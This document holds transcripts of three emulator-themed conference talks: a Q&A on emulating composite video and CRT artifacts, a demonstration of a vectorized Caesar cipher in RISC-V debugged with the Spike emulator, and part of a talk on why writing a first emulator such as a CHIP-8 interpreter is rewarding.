for any machine. Okay, I've actually got a couple of them by the way there's an open GL implementation and there's a metal implementation because Apple says that I must they're slightly different in the details but hopefully equally compatible. Yeah, thanks, I saw another question about how about I don't know how to pronounce it in English but the SAKEM I think. Oh yeah, so that's not actually using as I understand it not actually using quadrature amplitude modulation it's just like alternating which color signal it amplitude modulates per line so the idea there was that a phase doesn't matter then you can't have phase errors and so you would decode that in a in a different way. Okay, thanks. Somebody else asks where can I buy the hardware to record PCM at I don't know Samosper or whatever I don't know what the meaning of MSPS per second. I cannot offer buying recommendations. Okay, somebody answered an oscilloscope apparently. Yeah, yeah, that's obviously for sampling a real video signal from a real device. Okay, don't see another question I had a question myself was how would you go about verifying that your results are as correct as can be is it possible to like quantify it in certain ways especially with the for example though the say like physical effects of phosphor gradient decay or whatever else. Yeah, I wish I've been more rigorous about that stuff so let's see so back when I was starting to try to do this was actually more than six years ago so about a decade ago I wrote a basic ZX81 emulator which is a machine in which the programmer is wholly responsible for producing sync and that made me curious about how this all works and that's when I started vaguely trying to collect documentation. I had a few I managed at the time to find some lovely captured samples of real PAL video back then. So at least I was able to start with a comparison between how I was decoding that and the sort of the recommended the provided sample decoding but that was only I was only like you know frame and a half it was a very small amount of data so on the other things it has been somewhat subjective and empirical. I spent a long time I lived in San Francisco for a bit there's a museum there I have temporarily I'm not going to risk a pronunciation it's a name in French it's got a lot of old video game machines I arcade machines I definitely trolled around there taking phone shots close up of the CRT for a while to try to get a sense of that. So it's a bit of a bit in the eye of the holder right? Yeah especially for stuff like the phosphor decay which is a bit subjective and not necessarily completely mathematical. Okay cool thanks let's see I see question apologies if it has already been covered but I only is it approach amenable to artifacts that happen in the CRT? Things like dot crawl certainly so you know dot crawl is just improper separation of luma and chroma and the point is you know you can't really perfectly separate them because of the way they're multiplexed and therefore actually emulating the signal by combining them and then attempting to separate them rather than a more traditional like NTSC filter type approach i.e. emulators that start with a perfect signal and then you know mess it up a bit. Part of the point of actually generating the signal and then attempting to decode the signal is that the real issues that come when you try to decode such a signal do in fact manifest. Okay thanks another new question how does one reverse engineer CRT? I'm unclear if the scope of that question is pretty broad. Perhaps someone can narrow it down a little bit I'll take an aspect question for now. Have you considered having a warping effect to simulate the convex screens of this place? I haven't actually looked into it at all so I'm kind of on the opposite side of the curve compared to a lot of emulators also in this given that I'm generating the actual composite signal I actually try constantly to do a better job of separating it and decoding it rather than you know a worse job I don't want to call warping a worse job warping is just a physical fact of curved screens and yeah I should look into things like that. Okay thank you let's see do you intend to go further in the fast-force simulation in the future for instance CRT's pixels are not perfect dots and can blend with adjacent ones depending on things such as the intensity of the beam. I mean I intend to do a lot of things in the future but yeah that's another factor of real CRT's that I am not currently simulating so it's definitely something that I should try to tackle. Okay don't see one yet somebody typing so perhaps we get a question in a second I have one more question but it's also perhaps a bit a little bit broad but I don't know anything about these things like NTC and how it works and it's inner working so a lot of things in your presentation I didn't understand had to look up I wonder if you have like especially with no electronics background would we be a good resource to start learning about like this. Oh yeah no I had no electronics background I had a half a mathematics undergraduate from which I apparently learnt some trig identities I think I started with I think it was the Noon's video guidebook so like some of the old repair manuals for analogue engineers and most of it went straight over my head because I don't know a transistor from a resistor that's a good they have a different number of legs that's the clue but no so yeah that's why I came in it mostly from the mathematical side I think because my physical skills as an engineer are very slight. Okay thanks I know somebody was talking but apparently not a question. Do I know of anyone else who has a question or is there a problem? Let's see. Somebody says there are questions without votes so I'm going to take a quick look. So I guess I'll elaborate more on that last answer since I didn't necessarily answer the question so well. Oh yeah so I started off I managed to find some actual captures of real analogue frames that was a good place to start because I could plot those and get a good conceptual sense of what the signal looks like you know lots of wavy lines and dips. I have no idea what signal I've not just described. Then just trying to break that up and actually getting the code started like you know a lot of emulators authors there's a desire to get your hands dirty and just get something running that constantly fails and then look at where it fails and figure out what's failing and move on from there so you know discerning the syncs first then categorizing the syncs then you've got something of a black and white signal on screen and then you like well how do I turn this into colour and you can make some broad guesses of things like colour phase before you figure out how to lock to the colour burst similarly hard codes and relative intensities and keep moving. Okay thanks I've got another question now. Triniton displays have a different shape of the colour mask in other TVs can this be simulated? Would it happen after the final pass or somewhere between the two passes? Oh definitely actually I had some simulation of the different colour masks very early on and then I think I got rid of it just because of the programming reason but yeah I mean so you know the absolute simplest level actually one of the PNGs might still be in the repository doesn't matter yeah the basic level you get to the point where you're outputting the RGB you can just sample an additional source texture which is the mask map and multiply on through so like one extra sample one extra multiply per output pixel. Okay thanks we'll take a look again if I see some more questions which we're not sure what did they think we got from. I think especially as monitors go you know much higher pixel density there's a lot of new options for things like you know convincing colour mask simulation. Yes, I'm waiting on somebody else to start thinking again. Not that good in smart talk. Probably should have made the presentation longer. On our next steps you're going to take with this project in the near future. So I mean the actual substance of the project ends up being another yet another multi-machine emulator so the specific thing I'm working on right now is another additional machine it's the Apple 2GS right now which I don't know whether that was a wise choice because there's really only one set of documentation which is the official documentation and like most official documentation it's frequently ambiguous or incomplete and sadly the machine wasn't popular enough to get a lot of third party documentation and I don't have access to a real one so yeah this is like how we used to have to write emulators in the 1990s but hopefully after that's done I don't know I've been kind of working my way up so it was only like a 6502 emulator back in 2015 when I started. I gained the Z80, I gained the 68000 and there's all been attempts to do actual without trying to foreshadow the other presentation I'm giving today cycle perfect emulations of those processors but I've been looking more recently at stuff like you know platforms that are defined in terms of an instruction set rather than an actual concrete processor in which case the bus timings are just not an aspect of the way the platform is defined so I have another emulator which does CPM on, it's still called CPM for OS10 because it's pretty old now, I don't know CPM for Mac OS, doesn't even sound good but yeah that's another one of those platforms of course where you know there is a processor in there but the specifics of it are beside the point it's just supposed to be an instruction set in a binary interface. I don't know some of those which are completely disjoint of course from NTSC. Now they still sound very interesting and perhaps that's a nice like a hot to the question like which is that somebody finds this a really interesting obsession I don't know if we've got an obsession but what's the top of it? Oh I don't know, like I was writing so let's think about this it was for an airplane ride inevitably as these things often are sitting in the airport, SFO, trying to wait to, let's think about it. Oh so at the time I was a mobile developer doing iOS and this was around the time of probably iOS 4, Apple had just finally imported lambdas slash closures into their language which the rest of you will be laughing about and I was like oh I better learn some new syntax I better fire up something and do something so I started writing a half cycle position Z80 emulator based on you know in queuing future bus steps to take as lambdas slash closures slash whatever they're actually called in Objective C and once you've got that you're asking yourself well what can I run against it and that's how I got to the ZX80 slash 81 the first time around and yeah those machines are really interesting they kind of use the processor to generate the video so there will be a display buffer in memory and the processor will jump to it and then the hardware underneath will trick the processor by stealing whatever it fetches and forcing a knob to the actual processor so the processor will think it's just running lots of knobs but actually it's doing all of the video fetching just lovely so all of the graphics data ends up on the bus and there's a bunch of ways the other signals are used to figure out how long the line should be and where the sync should be and stuff like that but so you end up with a fully programmatic generation of video so you know there's the built-in ROM which does a pretty basic character based display and then there's clever people who figured out how to get a full pixel addressable display out of the exact same hardware even though it wasn't even an advertised feature and so you've got coming out of that you know a video signal it's just one dimensional syncs and pixels and the question is how do you decode that accurately especially because people who actually use those machines way back when and I'm not even old enough myself although clearly I'm close how do you decode that and make it look accurate and that's how I started getting onto the PLL slash sync separation side of things it's only a monochrome machine so from there it was a short leap to well how do people add color to this? Super, I saw like in the corner of my questions coming in so just continue I'm lucky enough to have a couple of CRT displays is there anything special I can use these for any experiments maybe that would help and emulate your development? Let's think about this I mean so what has been really useful to me most recently has been like high resolution high frame rate captures of a CRT and I'd better try to ask this in the next minute so yeah you kind of need more specialized equipment for capturing what it looks like because at this point I mean it depends on the age of CRTs how they want to be doing the color decoding.
|
Many emulators offer a CRT filter, an artist's rendition of classic video. This presentation describes emulation of the an entire NTSC or PAL video device, to produce an engineer's rendition — starting from sync discrimination and separation, through PLLs into scan placement and via QAM to extracting colour. In the implementation discussed work is split between CPU and GPU and a range of emulated source machines are demonstrated, including in-phase machines such as the Atari 2600, machines that routinely generate sync errors such as the ZX80, machines that generate a colour signal in software such as the Apple II, and interlaced machines such as the Acorn Electron.
|
10.5446/53650 (DOI)
|
Hello, FOSSTEM. How are you today? I hope everyone is enjoying the presentation so far. My name is Will Hawkins, and I'm here to present today the writing and testing of a parallel Caesar cipher in Risk 5. Before I get started, I just wanted to give you some contact information here on the first slide along with my pronouns. And I also wanted to say that I hope everyone out there watching today is safe and healthy, and the same is true of their family and friends. That's the most important thing right now. After that, I just want to say thank you to all the great organizers of this conference and especially of this particular track who have done such a great job organizing a wonderful list of presentations. I know that I'm enjoying the presentation so far, and I look forward to the ones that are coming after me, as well as some of the discussion that we're going to have today in the next few minutes. So I just wanted to give you a quick outline of what I'm going to talk about today. First I'm going to give you a brief introduction. I'll talk a little bit about Risk 5. I'll talk about what exactly is a Caesar cipher, some different ways that we can implement the Caesar cipher. And then we'll discuss the uniqueness of Risk 5 vector extensions, which are crucial for that Caesar cipher parallel implementation, which is our whole goal here after all. Then finally, and probably of most interest to the group here, I'll talk about Spike, which is an emulator for Risk 5. We'll talk about emulating the application that we wrote, the Caesar cipher implementation. And then we'll talk about debugging, how we do that in Spike. And at the end, I'll take some questions and we'll have a discussion, maybe even some more live coding. So as an introduction, all I'm assuming today is that you have an interest in this topic. That's really the basics. If you have a minimal familiarity with computer architecture, that'll really help. And I also assume that you'll ask questions in the chat or afterwards when you're confused. That'll give me a chance to interact with you and help make the presentation as meaningful as possible. I also expect that this awesome audience will correct me when I am wrong. Notice that I said when, not if. I'm sure that I will say something wrong as we go through this. I also want to say that all code is online and that these slides are shared so that you can follow all the links in here to all the code and the other references that I make. Finally just a quick introduction. I'm a software developer and computer scientist in the United States. I'm a long time free software user and contributor. And I love to learn new things. So that's why I'm here today. To present to you something new that I've learned. So let's talk first about what is risk five. Risk five is an instruction set architecture. Instruction set architecture is an abstract model of a computer. And a concrete implementation of an instruction set architecture is a CPU. The instruction set architecture tells the computer all of the things that it can do. It specifies how everything operates. And crucially it specifies the operations that the programmer can instruct the computer to do. Those instructions, those operations and the way that the programmer tells the CPU how to operate or the computer how to operate is through something called an instruction set. And the instruction set contains a set of instructions. You're all familiar with instruction set architectures. A few examples. The Intel x86 and ARM. So risk five instruction set architecture is similar to Intel x86 and ARM. But unlike Intel x86, it has the risk five has a reduced instruction set. The opposite of a reduced instruction set is what x86 is. It's a complex instruction set. And in a complex instruction set, each of the instructions that the computer can take and do is a high level instruction. In other words, you might be able to tell the computer to do something like make me a grilled cheese sandwich. That's a pretty high level instruction that includes a bunch of low level operations that need to be done in order to produce that grilled cheese sandwich. In a risk processor, on the other hand, you would break that complex operation down into a bunch of smaller operations, such as set location to the pantry, walk to the location, set the target to the door, open the door, etc. The idea and the benefit of doing a risk computer versus a SISC computer is that you can optimize each of those low level instructions and you make no assumptions about what the programmer wants to do. So the programmer is free to add as many different operations to compose as many low level operations as they want to come up with arbitrary high level behavior, rather than being confined to the high level behavior that the computer designer thought that the programmer would need. That's the technical difference. The policy difference, I think, is even more important. Unlike ARM and X86, risk five is free and open. That means that if you want to, if you're a computer manufacturer and you want to implement a CPU that is, that follows the risk five instruction set, you don't need to license that from ARM or X86. That's a huge, huge relief and a huge benefit. The work on risk five began in 2010 officially, but the concept of making a risk computer and the lineage of the risk five process of instruction set architecture has its lineages in the 1980s beginning with David Patterson's research at Berkeley. Now that we know what an instruction set architecture is and what risk five is, let's talk a little bit about what the Caesar cipher is. A cipher is just a way to encrypt text and decrypt text. This cipher is named after Julius Caesar famously, who is said to have used it to communicate with his army. The sender and the receiver of encoded messages share a key and that key is a shift distance. The sender encodes a plain text message by shifting each letter forward by this shift difference, by this key. The receiver, commensurately, receives the decoded message and decodes it by shifting each letter backwards by the same shift distance. As an example, if we wanted to encode the message piece to all of our generals in the military, we would shift each letter of that word forward by our shift distance. In this case, we're going to say it's a shift distance of one. So the message that our enemy might intercept is QFBDF. And unless they were smart enough to decode our secret key, which is so amazingly secure here, they would not be able to understand what that is. However, our general in the field would be able to shift each of those letters back by one and decode that message to receive the intended message that we mean to send piece to the enemy. So how do we implement the Caesar cipher? Well, we can do it in one of two ways. The easiest way is to do it sequentially, where we encrypt each letter of the message one at a time. And what I'm showing here is how we would encrypt and encode the message piece. The first thing that we do is we assume that each of the letters in the message is actually its ASCII representation. So the P is represented by the number 112, the E by 101, the A by 97, and so on and so forth. Because it's ASCII and we assume ASCII, we know that each of these will fit in an 8-bit spot. So the first thing that we want to do is encode the letter P. How do we do that? Well, we just add our shift distance, which in our example is one, and we get the letter Q represented here by 113. The same is true for the E, the A, the C, and the E. This sequential implementation can be accomplished in a form, in a paradigm called single instruction, single data. Each instruction that we did, each operation where we added one, operated on a single piece of data. In this case, it was the P and the letter 1. So our instruction was the add, and our single piece of data was the P and the letter 1. Now that seems very slow, and perhaps we can do it better. I'd really, since none of the operations depend on the other, I'd really like to be able to perform the entire encoding in parallel. And we can accomplish this using the paradigm single instruction, multiple data. So here's how we accomplish that. We simply say, all of my data is this string piece and the shift key 1 for each of those. So now we have two bits of data, but we have a single instruction, and that instruction is add. As a result, what we get is the message encoded all in one fail swoop. So how do we look at that in terms of the operations that the CPU can perform? Well, let's look at this as two vector operations, where we have a single instruction and multiple data. Our data comes from vector 0 and vector 1. Vector 0 has 1, 2, 3, 4, 5 instructions, and the same with vector 1. What we'll do is we assume that vector 1 contains the key for the message, and that is a 1 in the F, a 1 in the G, a 1 in the H, a 1 in the I, and 1 in the J. And we assume that the up here has our message, P-E-A-C-E. Here I'm just representing A through E so that I can show you conceptually how this works. The single instruction is to add vector 0 to vector 1 and store the result in vector 2. That's a single instruction, a single operation. And the data comes from vector 0 and vector 1. That's our multiple data. The result is that vector 2 is filled with A plus F, B plus G, C plus H, D plus I, E plus J, all in one operation. That makes things significantly faster. Now how is this implemented in a traditional instruction set architecture? Well in a traditional instruction set architecture, there may be a vector system. And let's say that that vector system is called V. That vector system has a series of vector registers that can store data and can store vectors. Let's say that we only have space enough in the vectors for each register in the vector system for each register to be 64 bits wide. But we want to operate as if that's more than one element. So we can break this down into two 32-bit elements inside a single vector. That's a vector with two elements. And let's say that I want to perform some operation on two of those. Well I might do a VAD 32 and a VSUB 32, a VMOL 32, etc. Those are different operations. But I can break this down further. Maybe I want four 16-bit elements in each register. And I want to perform operations on those. I might do a VAD 16, a VSUB 16, etc. Now what happens when I want to add some additional information? And I want to make this so that I can make the registers bigger. Well, that's easy. But is it? I want to maintain all the backwards compatibility. So I leave in my instruction set, I leave vector system V. And I simply add a new one. We'll call that vector system X. A vector register is now in vector system X, is now 128 bits. So I want to be able to divide that and perform operations. Well, now I can divide that into two 64-bit elements. I can divide it into four 32-bit elements. Or eight 16-bit elements. And for each one of those, I need a separate set of operations. But as you can tell, that escalated very quickly. Now the programmer has to remember all of these different operations in order to be able to perform their work. On the other hand, risk five is much more flexible. It specifies that a vector register in a vector system is simply n bits wide. And then I can divide that up into however many different elements fit into that by calling the Vset operation one time. In this case, I've called Vset and said that I want as many 64-bit elements in my vector register as possible. Then once I've configured it, all I have to do is call VAD, VSub, VMult, et cetera. It remembers the configuration. Now I can do the same without having to remember any more operations just by setting the vector register, the vector system, to say that each vector register has as many 32-bit elements as possible. So on for 16. And I've not added any other operations. That's more like it. So how do we do this for our risk five implementation? Well, we have our plain text, and we configure the vector. We configure the vector system into eight-bit elements for each vector register. And we have some leftover padding here, in most cases, which is fine. We just won't use it. So we load the plain text into the plain text vector. We load the key into the key vector. Then we encrypt, which is an add operation. We just add the t and the 1. We get u, e in the 1. We get an f, s in the 1. We get a t. The t in the 1. We get a u. Then we store that ciphertext back to memory. Now, let's see how that looks in practice. I've got here my code that I've downloaded from the internet. And you can see all those are all available on GitHub. And I've started by building this code using build Caesar.sh. And now I can simply execute run Caesar. And it asks me to enter a string to encode. I enter piece. And away we go. Piece encrypts to QFBDF. Pretty simple, right? Awesome. Now, what you may wonder is how I got an entire computer running on risk 5 and how I was able to do that demonstration. Well, actually, I wasn't. What I was doing was using an emulator. And if you're in this dev room, I'm assuming you're all familiar with the emulator. But why would I use the emulator in this case? Well, number one, it's very easy to test using an emulator. Number two, there's a lack of available risk 5 hardware that runs commodity operating systems. There's plenty of risk 5 hardware out there that are dedicated to very specialized processes. And it is proliferating across the industry. However, they don't all run commodity operating systems, like Linux, which is what I want to run. More importantly, I want to say that it's a lack of available risk 5 hardware to me. I don't have any. There are plenty of options out there. In fact, the Beagle 5 was just announced a few days ago, which is going to be $160 system on a chip that will let you run Linux, which is awesome. Finally, and probably most importantly, is the vector operations that we're using to run to do this Caesar Cypher implementation in parallel are not yet standardized. So there can't be any actual implementations out there that perform these. So we need to emulate them. So let's talk about how we built this code from our source code all the way to our executable application. The first thing on our host computer, we run a cross compiler. And we let the risk 5 assembler and cross compiler take our application source code and turn it into an executable. Again, that's on the host computer. Then we fire up Spike, which is our emulator. But Spike can't directly implement, can't directly execute a user application. Why not? Because all it's doing is executing, is emulating hardware. It's not emulating anything else. So what we need is a proxy kernel. And that proxy kernel will get started when the emulator starts, do the initialization of the emulated hardware appropriately, and then pass off control to our Caesar Cypher application, which is the point at which we're able to see that prompt on the screen. So from the perspective, let's dig a little bit deeper here. And let's talk about the proxy kernel. The risk 5 computer has three privilege modes of execution. There's machine mode, supervisor mode, and user mode. And here's how the process boots. The machine starts in machine mode, and it initializes control at the reset point. The first function that the kernel invokes is init-first-heart. And the heart is a hardware thread, and that's the most fundamental thread of execution in a risk 5 CPU. Then it calls bootloader to do the bootloading. Then it relinquishes the machine mode privileges that it has and enters supervisor mode, completes the rest of the bootloader. And finally, it will relinquish supervisor mode privileges and go to user mode, at which point it will start the, it'll call the start application, or call the start function in our application, which in turn calls the main function. And I'm assuming that you're all familiar with a main function in a program. Now, not only can Spike emulate programs and run them, it can also debug a system, which is pretty cool. Spike gives a GDB-like debugging interface with breakpoints that can be either unconditional or conditional. And it will allow for memory inspection. So it's very GDB-like, which is really, really neat. Let's give a quick example of how we would debug our CZR Cypher application if something were wrong. Let's say that I want to stop at the very first instruction that I wrote in my program and march through it one step at a time so that I can see what's going on. I want to stop at the beginning of the main function that I wrote. Well, while there are breakpoints in Spike, they operate a little bit differently than in GDB. In Spike, we cannot define a breakpoint using a symbol. So we can't say break main. We have to say equivalently that we want to break on a memory address. Therefore, in order to set our breakpoint, we have to define the address. We have to find the address of main in memory and set it as the breakpoint. So let's see how that looks. The first thing I'm going to do is I'm going to use obj dump in order to find out where main is, what its address is. So I'm going to say run obj dump, which is a script in the repository. And I'm going to redirect that output to caesar.obj. All right. Now I'm going to open the caesar.obj file. And I'm going to look for the main symbol. Look, it's right there. Amazing. All right. So if you're familiar with obj dump, and even if you're not, this is relatively straightforward to read once you understand what's going on. All this is saying that at address 0x10194, there's an add instruction. And that's where main is. So let's open this file up over here so we can follow along. It'll be a little bit small, but that's OK just for reference. So we'll quit this. And now what we're going to do is we're going to execute the command debug caesar, which is going to build and run spike in debug mode so that we get our command line, our debuggable interface, just like we would if we ran the program in GDB. So what you can see here is that you get a list of operations if you run help. And you can figure out what each of those are just by reading the documentation and playing around, which is what I did. So let's set our breakpoint. We'll say until PC, which is until the program counter on core 0, which is our only core, hits the address 0x10194. This instruction means execute the application until it hits address 0x10194. All right, so now we did that. And now let's continue to step through our program and see where we are. If you look over here, we expect to see that the next operation that we run is going to be this add i, where we move the stack pointer down to make room on the stack. And voila, there it is. Core 0 is just executed this add i instruction. I could do that again. And I could do that again. And in fact, if I just hit Enter, it'll do the same operation one more time. And what you'll see is the instructions that are executing over here correspond to the instructions that we have in our compiled code. Pretty darn cool. If there's time in the question and answer and people want to learn more about this, we can explore this a little bit more. So in conclusion, what did we talk about? Well, we talked about risk five and learned a little bit about it. We talked about what the Caesar cipher is. We talked about two different ways to implement the Caesar cipher. We talked about the uniqueness of risk five vector extensions. And we played around with the spike, which is a risk five emulator. We showed how you can emulate the application and debug the application. Again, all code is online. And I encourage you to submit feedback and ask questions. Thank you so much for taking the time to listen to the presentation today. I know that there are so many great presentations here going on in parallel that all of this is so overwhelming and you had a choice to choose my presentation. And I really sincerely appreciate it. Thanks again to all the organizers of the conference and especially of this particular track. I'm looking forward to the question and answers.
|
I will demonstrate how to write a vectorized (parallel) Caesar cipher in RISC-V (in assembler) using the project's emulator. Using the emulator is necessary at this point for such an application because the vectorized extension to the RISC-V ISA is not standardized. I will further demonstrate how the emulator itself is able to emulate the execution of a single user-space application when it is actually designed to emulate an entire system. This will involve a demonstration and explanation of riscv-isa-sim, riscv-pk and their interaction.
|
10.5446/53651 (DOI)
|
Hi everyone and thanks for joining. I'm very excited to be here. My name is Manaiotis and by the end of the talk I hope to get you interested in writing your first emulator. A few words about me. When it comes to science and technology, I enjoy all sorts of tinkering. I like playing around with electronics, building DIY projects and I occasionally build carnival costumes. I enjoy swimming, which is something I try to do every day, all year around. And of course, I also enjoy programming computers and that's why by day I work as a software developer. So on to the main subject. I'll try to present you with good reasons as to why writing your first emulator can be awesome. These will be through arguments which I've cherry picked out of my personal experiences and through my interest in emulators. Hopefully with any potential bias filtered out. I'll be focusing on the why rather than on the how you would go about writing an emulator. For one there are other speakers in this dev room more qualified to talk about the latter and for another I believe that why you would do something in the first place is the most important question to answer. I also find that answering the why question nicely complements and naturally leads to the how you would do something. Some technical knowledge would help in being able to follow this talk. For example, although the list is not necessarily conclusive, people with a good grasp of computer science fundamentals and programming experience should be able to easily follow along. Beyond this any curiosity about the inner workings of a computer, a general interest in retro computing or gaming console history should help you stay awake for the next 20 minutes. So let's get right to it. Let me first explain how this talk came to be. While I have had a very special interest in console emulators for a long time just in case not clear yet, I had always dismissed this fact to be just another one of my quirks and I never tried or never had a reason really to understand why this apparently very specific interest of mine existed in the first place. Then sometime last December I received an email from the FOSDM mailing list calling for papers on emulator development which meant that for the first time I was going to be a dev room dedicated to emulators and needless to say I pretty much flipped out upon realizing this. Of course, while at that moment I knew where I would be spending the better part of my FOSDM Saturday, I didn't plan on giving a talk. And anyway, after cooling down from reading this news, that question in the back of my mind resurfaced. Why? Why do I think emulators are so cool and why won't I stop talking about emulators at every opportunity? At this point I also realized that investigating this could also help answer the question why won't my friends invite me out for drinks anymore, which I thought would be a nice bonus. But joking aside, the more I thought about it, the more I realized that such an answer could also be of interest to other people attending the very same dev room that got me excited in the first place. So I decided to actually look into it, put my findings in a slideshow and here we are. So how did I go about answering the why? Looking into the past, I initially came up with the following. I've apparently always liked computers. And also having played my fair share of video games as a kid, I have awesome memories of spending hours looking for the last few gems in Spyro 2 to get to the 100% game completion along with the bragging rights that came with it. And furthermore, I got my first ever PC in the early 2000s and I was after I managed to convince my parents that having a computer was a prerequisite for being able to complete high school. So playing a lot of video games back then, you can imagine that the new world of possibility was before my eyes once I realized that I could also play console games on the same computer. And it so happened that emulators were some of the first programs that I ran on that PC. And by the way, if you get any nostalgia by these screenshots, then I'm happy to inform you that you're in the right FOSDEM dev room. Beyond this, I have always had an itch to understand how stuff works on the inside. I have been taking my toys apart since I was five years old, and I can proudly report that I have not broken all of them in the process. And finally, I'm also fascinated by the stories that can be told about the project. For example, in the context of gaming consoles, there was a Sony Nintendo partnership that fell apart before the original PlayStation took the form that we know today. So during this trip down memory lane, I recalled a particular incident from a few years back after which I decided to have a go at writing a name letter to myself, and it went down like this. During that incident, I had a flashback from my high school years. And I remembered that at the time, I really looked up to the people developing the emulators that I was running on my PC. And exactly because I looked up to them, I wanted to do the same thing that they did. But I couldn't because I didn't know how to program a computer. So I fast forward to the mid 2010s and I get my light bulb moment. I say, wait a minute, now I program computers for a living. So I could and I should have a shot at this. So I then started searching online to get an idea of how I should go about this and eventually decided to put some time aside to write a chip aid interpreter. That was like for many other people, the first glimpse of what it can feel like to be involved with emulator development. I should mention here that the chip aid is a system specification or that of a virtual machine, if you like, rather than actual hardware. It was developed in the 1970s in order to enable the programming of games for the computers of that era. Thus, technically speaking, a chip aid interpreter is not actually emulating any hardware. That being said, it's still a great place to start in this domain, as it does put you in the right track, while also being a simple and well documented system. And you can think of it as a hello world of emulator development. So back then, when I was developing that chip aid interpreter, I remember having a lot of fun doing it and having a general sense of euphoria throughout the experience. And for this talk, I searched around and after a couple of hours of digging my way through files, I actually managed to find the source code. And I compiled it and I run it and I loaded the game and recorded the amazing gameplay footage of the console on the screen. For anyone interested, graphics and input were handled using SDL. As a side note, I also remember showing this off to my friends back then, but they didn't seem to share my level of enthusiasm for whatever reason. Anyway, at this point, following the general theme of this journey, I wanted to pinpoint why exactly this was so fun and to present hopefully objective arguments as to why this could also be appealing to other people. Okay, so when creating this slide, I wanted to be absolutely sure that I convey my enthusiasm. So I came up with a metaphor, which I thought could also make me sound sophisticated for my first talk at FOSDEM. And it goes like this, the process of developing an emulator is analogous to that of beating a video game. When you implement the core functionality of the system, such as handling instructions that an emulated processor will need to execute, drawing graphics or handling user input, that's when you're playing the main story mode. This goes nicely with the fact that both the hardware you want to emulate and the software you want to run are effectively frozen in time. Thus, the whole process has a relatively well defined beginning and ending. And you will likely have the system specification available that in this metaphor serves as the rules of the game, by which you'll need to abide if you want to complete it. Then after you complete the main story mode, you can do all sorts of optional side quests through which you could unlock a permanent superpower, for example. In this metaphor, this corresponds to adding extra features to the emulator, which you will do once again inside the sandbox of this metaphorical game, since you will still need to play by its rule to some extent. So, if you've ever switched from playing Pokémon on an emulator to playing on actual Game Boy hardware, you will know how not having a fast forward button can feel like a big down rate. And the same could be said about safe states. When creating a safe state, you are taking a snapshot of the state of the system, meaning the contents of the registered memory, and you save it on disk for later use. So, as you can imagine, whenever you decide to load this state at a later time, you'll be able to continue exactly where you left off. You can compare this to what you'd get when you put a virtual machine to hibernate and then go and put it up afterwards. In a video game, this possibility can be especially useful if you need to pause playing under circumstances that a game doesn't allow you to actually save your progress. Taking it further, you could also implicitly keep a history of these system states while you're playing the game. For example, you might decide to store the system state every half a second and keep the states in a queue that can hold up to 20 of them. This means that at any point, you'll have the last 10 seconds of gameplay, cached, and accessible in half a second steps. So, you might have realized where I'm going with this, this continuous state sampling allows you to easily roll back time in the game, for example, if you need to undo a mistake from a few seconds ago. Of course, the list goes on, but the main takeaway here is that an emulator can have an improved and richer feature set compared to the actual hardware, and it has the potential to beat the game when it comes to performance, which I think is pretty awesome when you consider the fact that you're running a game which wasn't compiled to run natively on the hardware you're using. Beyond the cheesy metaphor that you just had to suffer through, why can I say that it was interesting? It was effectively computing them backwards because you're in the situation where you have the software being complete, but the hardware being incomplete, and actually it doesn't even exist when you start. So, what do you do? You build this computer, and since you're building it with software, you have all the tools you need at your disposal. And what is really cool about this computing done backwards thing is that once you are confident that you are emulating all of the system's instructions correctly, which is a milestone that you've likely reached by loading some relatively simple games, you can generally expect other games, even more complex ones, to just work. As a side note, if you do decide to write a cheap interpreter after watching this, I recommend setting aside a game or two that you forget about, and only try loading after you've reached this milestone. You will get an incredible sense of accomplishment from it, assuming of course that you don't get something like this. Furthermore, when learning something new, I find it especially important to do so in a context that matters to me, and one that I can relate to. Otherwise, it can start feeling like a chore. So, someone might want to write a console emulator, as opposed to an emulator for some arbitrary CPU core, because they're into video games in general, or if you're like me because of the nostalgia that you get from revisiting the games of your childhood. And a few more points to wrap up this section. The end result of such a project is pretty self-explanatory, meaning that you get to see a video game come to life. And games are always cool, and most people can relate to them in one way or another. So, given that others can relate to the end result as well, you can feel comfortable or even excited to show it off. It's really unlikely that you'll have to answer the question, so what does it do when you show off your project to your friends in trying to explain why you have gone missing for over a month now? That being said, I'm sorry to say that most likely you will still be asked the question, why did you even bother to do this? But given the fact that you're still watching this talk, I think you should already be able to put a compelling answer together. And finally, as a bonus for a hobby project that enables you to play a video game, you don't even have to write that game. So, moving on. Writing an emulator can be an awesome learning experience. There's obviously a technical aspect to this, as you get to revisit concepts of computer science, like registers and memory and interrupts. And while a lot of people are taught about these concepts in university, in order to just be able to pass an exam, you now get to witness their importance and what role they play on the output of a piece of software that you find relevant, using an awesome tool that you created, which effectively allows you to see what's happening on the inside of a gaming console when it's running a game. In addition, getting close and personal with the inside of a system can get you curious to also learn things outside of this more or less anticipated technical context, meaning to learn about the history of gaming consoles, the people behind them, and interesting stories about their games. I've included two examples here. One is about the awesome hacks that developers of the first Crash Bandicoot came up with in order to reach the level of visual detail that they wanted for the game, as the SDK provided by Sony just wasn't going to cut it. And the other is about the port of Resident Evil 2 for the Nintendo 64. The thing that was assigned this project managed to squeeze a game sized well over a gigabyte into just 64 megabytes, which was the maximum that a Nintendo 64 cartridge allowed. Of course, learning about the history of a system is just a nice side effect and not a prerequisite for writing an emulator, but it's still cool nevertheless. The nature of a project such as an emulator will help you appreciate the importance of best practices when developing software. You get to see the direct impact of code efficiency and performance, or at least more so when compared to other types of projects. And being a complex project, your code needs to be maintainable, even if you're the only one working on it. Otherwise, you can be sure you'll find yourself lost when you resume development after even a few days of a break. Now, even if this seems obvious, I'll point it out anyway, debugging a complex project using only pre-death statements won't cut it. If you want to keep your sanity, you will use a debugger and you should anyway be trying to make the most out of it when developing software. Beyond this, debuggers have an important place in the world of emulators and you will likely write one yourself in order to be able to debug and understand the code of the game itself as part of your effort to make your emulator play nice with that game. Furthermore, you'll be reminded about what stuff we might take for granted today, things like high-level languages, libraries and tools that make our lives much easier by abstracting away a lot of the gory details. And even the possibility of being able to update software after it has been released or deployed is something we take for granted. So, when the Gran Turismo 2 was released for the original PlayStation in 1999, the Japanese version of the game actually shipped with a bug that prevented players from reaching 100% completion. And remember that that game could only run off of the disk that it shipped on and thus could not be physically patched in any way. So, Sony had to eventually send replacement these two customers. To state once again the obvious, during this journey you will be using tools consulting with documentation and possibly source code that other people decided to share with the world and the importance of this cannot be overstated. The efforts of communities that share their work for everyone to benefit from have a direct impact on improving our everyday lives, let alone our lives as developers. And when it comes to the emulator development scene, in particular it's because of people like them that not just technical knowledge is preserved, but also the history and legacy of the systems. Sure, this can be in the form of an emulator, of course, since you'll be able to experience games developed for systems which will be increasingly harder to get a hold of as time passes by, let alone in working condition, but also all forms of documentation play their part in this, like retro computing blogs run by 